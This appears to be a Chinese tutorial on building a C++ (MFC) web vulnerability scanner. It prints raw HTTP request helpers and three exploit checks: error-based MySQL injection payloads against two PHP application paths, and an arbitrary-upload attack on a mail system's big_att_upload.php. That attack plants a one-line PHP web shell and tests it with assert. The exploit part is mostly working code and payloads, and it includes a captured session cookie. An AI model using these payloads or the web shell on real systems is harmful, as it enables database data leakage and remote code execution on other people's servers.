VC 每次更新都需要重新编译一次，好麻烦的说。
首先实现构造并发送 GET 请求和 POST 请求的两个函数（下面用到的 m_strHost、m_strWebRoot、cookie、defaultCharset 等都是所在扫描类的成员）。
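// Builds a raw HTTP/1.1 GET for m_strWebRoot + url and hands it to sendToTarget().
//
// url    path and query, relative to the web root. Only ' ' is percent-encoded; every other
//        byte (including CR/LF, which would terminate the request line) is sent verbatim.
// bRecv  forwarded to sendToTarget() unchanged; presumably "read the reply" (defined there).
// bSmall forwarded to sendToTarget() unchanged; its meaning is not visible in this file.
//
// NOTE(review): the request is HTTP/1.1 without "Connection: close". If sendToTarget() reads
// until the peer closes, a keep-alive server will hold the read until its idle timeout — confirm.
void GetRequest(char *url, BOOL bRecv, BOOL bSmall)
{
    CString enUrl = url;
    enUrl.Replace(" ", "%20");

    // Cookie header only when a session cookie has been stored on this object.
    CString cookieValue = "";
    if (cookie != "") {
        cookieValue = "Cookie: " + cookie + "\r\n";
    }

    // CString arguments are cast to LPCSTR so %s receives a plain pointer instead of
    // relying on CString's object layout inside a varargs call.
    CString GetPackage = "";
    GetPackage.Format("GET %s%s HTTP/1.1\r\n"
                      "Accept: */*\r\n"
                      "Accept-Language: zh-cn\r\n"
                      //"Accept-Encoding: gzip, deflate\r\n"   // left disabled in the original; presumably because getInfo() matches the reply as plain text — confirm
                      "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"
                      "%s"
                      "Host: %s\r\n\r\n",
                      (LPCSTR)m_strWebRoot, (LPCSTR)enUrl, (LPCSTR)cookieValue, (LPCSTR)m_strHost);

    // Web root, path and query may all contain Chinese, so the whole request is re-encoded.
    // Bug fix: the original compared defaultCharset with "utf" here but with "utf8" in
    // PostRequest, so one of the two paths could never select UTF-8. Both spellings select it now.
    UINT wireCodePage = (defaultCharset == "utf" || defaultCharset == "utf8") ? CP_UTF8 : CP_ACP;
    CString encodedPack = EncodeHanzi(GetPackage, CP_ACP, wireCodePage);

    sendToTarget(encodedPack.GetBuffer(0), bRecv, bSmall);
    encodedPack.ReleaseBuffer(); // every GetBuffer() gets its matching ReleaseBuffer()
}

// Builds a raw HTTP/1.1 POST (application/x-www-form-urlencoded) for m_strWebRoot + url
// carrying `data` as the body, and hands it to sendToTarget().
//
// url    path and query, relative to the web root; only ' ' is percent-encoded.
// data   request body, sent as-is apart from charset conversion — the caller must already
//        have URL-encoded it (the commented-out UrlEncode lines are an earlier, abandoned attempt).
// bRecv  forwarded to sendToTarget() unchanged.
//
// Content-Length is the byte length of the converted body; this holds because the whole file
// uses narrow ("...") literals, i.e. a non-Unicode build where CString is char-based.
void PostRequest(char *url, char *data, BOOL bRecv)
{
    CString enUrl = url;
    enUrl.Replace(" ", "%20");
    // Earlier attempt at full URL-encoding of the path, kept for reference:
    // enUrl.Replace("&","$_and_$");
    // enUrl=CParser::UrlEncode(enUrl);
    // enUrl.Replace("$_and_$","&");

    CString cookieValue = "";
    if (cookie != "") {
        cookieValue = "Cookie: " + cookie + "\r\n";
    }

    // Same charset rule as GetRequest (both "utf" and "utf8" mean UTF-8 on the wire).
    UINT wireCodePage = (defaultCharset == "utf" || defaultCharset == "utf8") ? CP_UTF8 : CP_ACP;
    CString encodedUrl  = EncodeHanzi(enUrl, CP_ACP, wireCodePage);
    CString encodedData = EncodeHanzi(data,  CP_ACP, wireCodePage);

    CString PostPackage = "";
    PostPackage.Format("POST %s%s HTTP/1.1\r\n"
                       "Accept: */*\r\n"
                       "Content-Type: application/x-www-form-urlencoded\r\n"
                       "Host: %s\r\n%s"
                       //"Accept-Encoding: gzip, deflate\r\n"
                       "Content-Length: %d\r\n"
                       "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\r\n\r\n%s",
                       (LPCSTR)m_strWebRoot, (LPCSTR)encodedUrl, (LPCSTR)m_strHost, (LPCSTR)cookieValue,
                       encodedData.GetLength(), (LPCSTR)encodedData);

    sendToTarget(PostPackage.GetBuffer(0), bRecv);
    PostPackage.ReleaseBuffer();
}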
然后在类里声明它们的原型，并给参数设置默认值。
// Prototypes for the two request helpers; by default neither waits for a reply.
// NOTE(review): these are declared as makePostRequest/makeGetRequest, while the definitions
// printed above are named PostRequest/GetRequest and the upload code below calls
// makePostRequest(). As shown, declarations and definitions do not match — confirm which name
// the class actually uses before copying this.
void makePostRequest(char *url, char *data,BOOL bRecv=FALSE); // url, POST body, whether to read the server's reply
void makeGetRequest(char *url,BOOL bRecv=FALSE,BOOL bSmall=FALSE); // url, whether to read the reply; bSmall is passed through to sendToTarget (meaning not shown here)
然后分别调用它们发送 GET 和 POST 请求来检测漏洞。
首先是 GET 请求的例子，漏洞详情见 http://0day5.com/archives/3021
// Fragment of a larger check routine (the enclosing function and its return type are not shown).
// Error-based MySQL injection probe in the `mod` parameter of /wap/?action=show, using the
// count(*)/floor(rand(0)*2)/group-by duplicate-key trick to leak version() through the error text.
// It only works when the application echoes the database error back into the page: on a target
// that hides errors this check stays silent, so "no match" must not be read as "not vulnerable".
GetRequest("/wap/?action=show&mod=admin%20where%20userid=1%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23",TRUE); // send the GET and read the reply
CString strRet=getInfo("Duplicate entry '(.*?)'"); // regex over the reply; the capture is what concat() leaked (version() here)
if (strRet!="") // a non-empty capture means the error text came back, i.e. the injected SQL executed
{
    return "/wap/?action=show&mod=admin where userid存在显错式注入! 版本"+strRet;
}
再来看一个POST请求的,漏洞详情,请关注:http://0day5.com/archives/3028
// Fragment of the same check routine (enclosing function not shown).
// Same error-based MySQL probe as the GET case, this time in the POST field `id` of
// /delete_cart_goods.php. The body is passed through PostRequest() verbatim, so it has to be
// URL-encoded by hand here (note the %20 for spaces); the same "errors must be displayed"
// caveat applies.
PostRequest("/delete_cart_goods.php","id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)",TRUE); // PostRequest(url, data, read reply?)
strRet=getInfo("Duplicate entry '(.*?)'"); // capture the leaked value from the MySQL error text
if (strRet!="")
{
    return "/delete_cart_goods.php id存在post显错式注入! 版本"+strRet;
}
还有一个上传漏洞的例子，漏洞详情请关注：http://0day5.com/archives/3039 。注意抓包里的 PHPSESSID 是抓包时那个登录会话的 Cookie，后面的代码把它写死了，换目标时必须替换成有效的会话。
它的数据包是这个样子的
POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1 Host: mail.domain.com:889 Connection: keep-alive Content-Length: 658 Origin: http://mail.domain.com:889 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Accept: */* Referer: http://mail.domain.com:889/src/write_mail.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4 Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filename" vultest.php ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="PHPSESSID" outb98m2mckt5a03pejd1aqra0 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="dir" /var/www/newmail/ ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filedata"; filename="vultest.php" Content-Type: application/octet-stream 12345 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Upload" Submit Query ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--
我们把它分成头部还有内容两个部分
头部是这样子的
POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1 Host: mail.domain.com:889 Connection: keep-alive Content-Length: 658 Origin: http://mail.domain.com:889 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Accept: */* Referer: http://mail.domain.com:889/src/write_mail.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4 Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn
内容部分是这个样子的
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filename" vultest.php ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="PHPSESSID" outb98m2mckt5a03pejd1aqra0 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="dir" /var/www/newmail/ ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Filedata"; filename="vultest.php" Content-Type: application/octet-stream 12345 ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5 Content-Disposition: form-data; name="Upload" Submit Query ------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--
然后就好办了：把数据包改写成 C 字符串字面量——每个换行写成 \r\n，双引号记得转义为 \"。另外 Content-Length 要按正文的实际长度重新计算，不能照抄抓包里的 658。
// Fragment of a larger check routine (enclosing function not shown).
// Replays the captured multipart upload to /src/big_att_upload.php with a PHP file as the
// attachment, then probes whether the uploaded file executes.
//
// NOTE(review), things a reader should check before trusting this block:
//  * The Cookie header carries the PHPSESSID copied from the capture; it is hard-coded here
//    (the `cookie` member is not used), so against any other target/session the upload
//    request is unauthenticated and this check will simply fail.
//  * The `dir` field is a client-supplied absolute path (/var/www/newmail/) — the server
//    appears to accept it as the destination directory.
//  * Three different file names are in play: the Filename field says guige.php, the Filedata
//    part's filename= says shell.php, the probe requests /shell.php, and the success message
//    reports /guige.php. Which name the server honours decides where the file lands; as written,
//    the probe and the reported URL cannot both be right.
//  * The success test Find("1") matches any reply containing the character '1' (a status line
//    would do, if GetResponseContent() includes headers) — expect false positives.
//  * The probe goes through makePostRequest(), which (per PostRequest above) prepends
//    m_strWebRoot, while the upload itself is posted to /src/... without it — confirm that is intended.
CString uploadPack="",uploadHead="",uploadBody=""; // whole packet, header part, body part
// Multipart body, copied from the capture; boundaries and field names must match the header's boundary.
// The attachment content is a one-line PHP web shell (function name from ?0=, argument from param 1).
uploadBody="------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\nguige.php\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"PHPSESSID\"\r\n\r\noutb98m2mckt5a03pejd1aqra0\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"dir\"\r\n\r\n/var/www/newmail/\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php @$_GET[0](@$_REQUEST[1]);?>\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Upload\"\r\n\r\nSubmit Query\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--"; // body part
// Header part; Host/Origin/Referer come from m_strHost and Content-Length is recomputed from the body.
uploadHead.Format("POST /src/big_att_upload.php HTTP/1.1\r\nHost: %s\r\nConnection: keep-alive\r\nContent-Length: %d\r\nOrigin: http://%s\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36\r\nContent-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nAccept: */*\r\nReferer: http://%s/src/write_mail.php\r\nCookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn\r\n\r\n", // header part
    m_strHost,uploadBody.GetLength(),m_strHost,m_strHost); // host, body length, host, host
uploadPack=uploadHead+uploadBody; // join header and body into one packet
sendToTarget(uploadPack.GetBuffer(0),TRUE); // send it and read the reply
// Probe whether the uploaded file executes: ask it to run echo and look for the output.
makePostRequest("/shell.php?0=assert","1=echo 1;",TRUE);
if(GetResponseContent().Find("1",0)!=-1){ // weak check: any '1' anywhere in the reply counts as success
    return "http://"+m_strHost+m_strWebRoot+"/guige.php?0=assert 密码1";
}